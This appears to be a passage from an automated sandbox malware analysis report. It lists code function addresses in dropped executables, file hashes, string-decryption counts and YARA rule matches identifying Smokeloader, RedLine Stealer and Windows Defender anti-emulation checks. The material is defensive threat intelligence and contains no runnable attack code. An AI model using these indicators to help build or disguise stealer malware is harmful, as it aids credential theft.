Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_0043AD30	6_2_0043AD30
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00407DF0	6_2_00407DF0
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00404EF0	6_2_00404EF0
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00435EB0	6_2_00435EB0
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00403F80	6_2_00403F80
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_020F1267	6_2_020F1267
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_0212B2B7	6_2_0212B2B7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_021163DB	6_2_021163DB
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_020F8057	6_2_020F8057
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_02112067	6_2_02112067
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_02126117	6_2_02126117
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_020F5157	6_2_020F5157
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_020F41E7	6_2_020F41E7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_020FF667	6_2_020FF667
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_020F56A7	6_2_020F56A7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_021236E7	6_2_021236E7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_02106739	6_2_02106739
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_020F37D7	6_2_020F37D7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_020F6457	6_2_020F6457
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_021164EB	6_2_021164EB
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_021175BA	6_2_021175BA
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_02110AE7	6_2_02110AE7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_020F4BD7	6_2_020F4BD7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_02115F55	6_2_02115F55
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_0212AF97	6_2_0212AF97
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_020F8C07	6_2_020F8C07
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Code function: 8_2_0429AB10	8_2_0429AB10
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF9ECD0	9_2_6CF9ECD0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D0C8D20	9_2_6D0C8D20
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF3ECC0	9_2_6CF3ECC0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D06AD50	9_2_6D06AD50
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D00ED70	9_2_6D00ED70
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF4AC60	9_2_6CF4AC60
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D0CCDC0	9_2_6D0CCDC0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D006C00	9_2_6D006C00
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D01AC30	9_2_6D01AC30
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF44DB0	9_2_6CF44DB0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFD6D90	9_2_6CFD6D90
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D080F20	9_2_6D080F20
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF4AEC0	9_2_6CF4AEC0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFE0EC0	9_2_6CFE0EC0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFC6E90	9_2_6CFC6E90
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D002F70	9_2_6D002F70
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFDEE70	9_2_6CFDEE70
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D088FB0	9_2_6D088FB0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D01EFF0	9_2_6D01EFF0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF40FE0	9_2_6CF40FE0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D020E20	9_2_6D020E20
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF4EFB0	9_2_6CF4EFB0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFAEF40	9_2_6CFAEF40
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF46F10	9_2_6CF46F10
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D0009B0	9_2_6D0009B0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF90820	9_2_6CF90820
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFCA820	9_2_6CFCA820
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D05C9E0	9_2_6D05C9E0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF749F0	9_2_6CF749F0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D014840	9_2_6D014840
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFD09A0	9_2_6CFD09A0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFFA9A0	9_2_6CFFA9A0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF78960	9_2_6CF78960
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D02C8C0	9_2_6D02C8C0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D0468E0	9_2_6D0468E0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF96900	9_2_6CF96900
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFBEA80	9_2_6CFBEA80
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFBCA70	9_2_6CFBCA70
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFF8A30	9_2_6CFF8A30
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D02EBD0	9_2_6D02EBD0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D046BE0	9_2_6D046BE0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D044BE0	9_2_6D044BE0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFEEA00	9_2_6CFEEA00
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFE0BA0	9_2_6CFE0BA0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D040AC0	9_2_6D040AC0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF864D0	9_2_6CF864D0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFDA4D0	9_2_6CFDA4D0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D044540	9_2_6D044540
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D088550	9_2_6D088550
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF58460	9_2_6CF58460
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFCA430	9_2_6CFCA430
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA4420	9_2_6CFA4420
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D00A5E0	9_2_6D00A5E0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFCE5F0	9_2_6CFCE5F0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF345B0	9_2_6CF345B0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D06A480	9_2_6D06A480
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFE0570	9_2_6CFE0570
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA2560	9_2_6CFA2560
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF98540	9_2_6CF98540
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF9E6E0	9_2_6CF9E6E0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFDE6E0	9_2_6CFDE6E0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF646D0	9_2_6CF646D0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF9C650	9_2_6CF9C650
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF6A7D0	9_2_6CF6A7D0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFC0700	9_2_6CFC0700
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D024130	9_2_6D024130
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF500B0	9_2_6CF500B0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF38090	9_2_6CF38090
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF8E070	9_2_6CF8E070
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D00C000	9_2_6D00C000
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D008010	9_2_6D008010
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF401E0	9_2_6CF401E0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D01C0B0	9_2_6D01C0B0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA8140	9_2_6CFA8140
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFB6130	9_2_6CFB6130
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D05C360	9_2_6D05C360
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D082370	9_2_6D082370
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFC8260	9_2_6CFC8260
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFD8250	9_2_6CFD8250
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D00A210	9_2_6D00A210
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF943E0	9_2_6CF943E0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D018220	9_2_6D018220
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF9E3B0	9_2_6CF9E3B0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF723A0	9_2_6CF723A0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF42370	9_2_6CF42370
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFD6370	9_2_6CFD6370
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D0122A0	9_2_6D0122A0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D00E2B0	9_2_6D00E2B0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF48340	9_2_6CF48340
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D0C62C0	9_2_6D0C62C0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFB2320	9_2_6CFB2320
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFDFC80	9_2_6CFDFC80
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D089D90	9_2_6D089D90
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF43C40	9_2_6CF43C40
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D011DC0	9_2_6D011DC0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF51C30	9_2_6CF51C30
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D069C40	9_2_6D069C40
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D04DC60	9_2_6D04DC60
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF33D80	9_2_6CF33D80
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D07DCD0	9_2_6D07DCD0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D001CE0	9_2_6D001CE0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA3D00	9_2_6CFA3D00
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D097F20	9_2_6D097F20
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D043F30	9_2_6D043F30
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF63EC0	9_2_6CF63EC0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D05DFC0	9_2_6D05DFC0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D0C3FC0	9_2_6D0C3FC0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFEBFF0	9_2_6CFEBFF0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D04DE10	9_2_6D04DE10
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF61F90	9_2_6CF61F90
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D0C5E60	9_2_6D0C5E60
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D09BE70	9_2_6D09BE70
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF35F30	9_2_6CF35F30
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF75F20	9_2_6CF75F20
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D08F900	9_2_6D08F900
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF4D8E0	9_2_6CF4D8E0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF738E0	9_2_6CF738E0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFDF8C0	9_2_6CFDF8C0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D011990	9_2_6D011990
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF9D810	9_2_6CF9D810
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA59F0	9_2_6CFA59F0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFD79F0	9_2_6CFD79F0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF799D0	9_2_6CF799D0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFD99C0	9_2_6CFD99C0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D013840	9_2_6D013840
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF51980	9_2_6CF51980
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFBF960	9_2_6CFBF960
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFFD960	9_2_6CFFD960
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFF5920	9_2_6CFF5920
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D01F8F0	9_2_6D01F8F0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D09B8F0	9_2_6D09B8F0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF41AE0	9_2_6CF41AE0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D01FB60	9_2_6D01FB60
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D025B90	9_2_6D025B90
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D009BB0	9_2_6D009BB0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF7FA10	9_2_6CF7FA10
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFE1A10	9_2_6CFE1A10
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF87BF0	9_2_6CF87BF0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D03DA30	9_2_6D03DA30
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF99BA0	9_2_6CF99BA0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D0C9A50	9_2_6D0C9A50
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF31B80	9_2_6CF31B80
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D01DAB0	9_2_6D01DAB0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF8BB20	9_2_6CF8BB20
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF414E0	9_2_6CF414E0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D08F510	9_2_6D08F510
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D0375D0	9_2_6D0375D0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFCD410	9_2_6CFCD410
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFC55F0	9_2_6CFC55F0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D029430	9_2_6D029430

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\HJJJECFIECBG\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\HJJJECFIECBG\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: String function: 004087A0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: String function: 0040F5A0 appears 139 times
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: String function: 020FF807 appears 139 times
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: String function: 020F8A07 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: String function: 6D0CD930 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: String function: 6D0C09D0 appears 305 times
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: String function: 6CF69B10 appears 98 times
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: String function: 6D079F30 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: String function: 6CF63620 appears 95 times
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: String function: 6CF9C5E0 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: String function: 6D0CDAE0 appears 72 times

One or more processes crash

Source: C:\Users\user\AppData\Local\Temp\F441.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 1640

Sample file is different than original file name gathered from version info

Source: 4.exe, 00000000.00000002.1712269261.0000000002C8C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesFilezera2 vs 4.exe
Source: 4.exe	Binary or memory string: OriginalFilenamesFilezera2 vs 4.exe

Uses 32bit PE files

Source: 4.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 8.2.9EDA.exe.44d0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.9EDA.exe.4490000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.9EDA.exe.4267719.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.9EDA.exe.4490000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.9EDA.exe.4267719.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.9EDA.exe.44d0000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.1997135222.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1712643211.0000000002EEB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.1997158048.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000008.00000002.2367654116.0000000004490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000000.00000002.1712353745.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1712494428.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000006.00000002.2557763038.00000000004FE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.1997359017.000000000300B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
